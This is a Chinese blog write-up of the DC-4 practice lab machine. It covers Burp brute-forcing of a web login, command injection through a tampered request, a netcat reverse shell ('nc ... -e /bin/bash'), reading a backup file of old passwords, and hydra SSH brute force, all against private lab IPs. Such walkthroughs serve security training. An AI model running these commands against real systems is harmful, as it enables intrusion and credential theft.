DC-4学习记录

本文介绍了通过信息收集、漏洞挖掘和利用,使用Burp Suite爆破用户名和密码,并通过nc进行命令执行。在获取到靶机的ls命令权限后,查看了command.php文件并进一步执行whoami命令。接着,通过shell_exec和nc建立连接,寻找并尝试破解SSH登录密码,最终成功连接并获取了旧密码信息。
摘要由CSDN通过智能技术生成

一、信息收集

1、靶机ip

192.168.209.153

二、漏洞挖掘

1、访问ip地址

我们发现这是个登录框
在这里插入图片描述

三、漏洞利用

1、burp爆破用户名和密码

在这里插入图片描述

用户名:admin
密码:happy

2、抓包、修改信息

在这里插入图片描述

在这里插入图片描述

我们发现选定第一个,点击run,好像是执行一个列出所有文件操作,为了验证猜想,我抓包看一下。

在这里插入图片描述
在这里我们可以看出提交有ls命令,我尝试一下输入其他命令,看看能不能成功,在上面列出的文件里有command.php文件,那么我可以查看一下这个文件,看看可不可以查看成功。
在这里插入图片描述
我们可以看出我们查看到了command.php文件。
在这里插入图片描述
再比如输入whoami
在这里插入图片描述

四、nc

1、配置连接

shell_exec —通过 shell 执行命令并将完整的输出作为字符串返回.

nc
-h

在这里插入图片描述
开启监听:

nc -l -vv -p 8888

program to exec after connect [dangerous!!]

原来是这:
在这里插入图片描述
现在输入kali的ip进行连接

nc 192.168.209.143 8888 -e /bin/bash

在这里插入图片描述
然后点击forword
在这里插入图片描述

whoami

在这里插入图片描述这样就显示已经监听成功了。

2、查找有用信息

我们可以尝试着找root

cd /home
ls
cd ./jim
ls
cd ./mbox
ls
cd ./backups
ls

在这里插入图片描述
好,那我们查看一下这个文件。

cat old-passwords.bak

在这里插入图片描述
这里好像是一些老的密码。
我们这里保存一下
在这里插入图片描述

3、破解ssh登录密码

在这里插入图片描述
这里jim作为user

(1)、使用hydra工具

爆破ssh

hydra -l jim -P dc-4.txt -t 10 ssh://192.168.209.153

hydra -l 用户名 -p 密码字典 -t 线程 ip ssh

ssh账号:jim密码:jibril04
注意:不要用反弹的shell,因为自己创建的文件在本地的shell里面,所以要在本地的SHELL里输入命令。

在这里插入图片描述

五、写在末尾的话

有关nc:
https://www.sqlsec.com/2019/10/nc.html
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值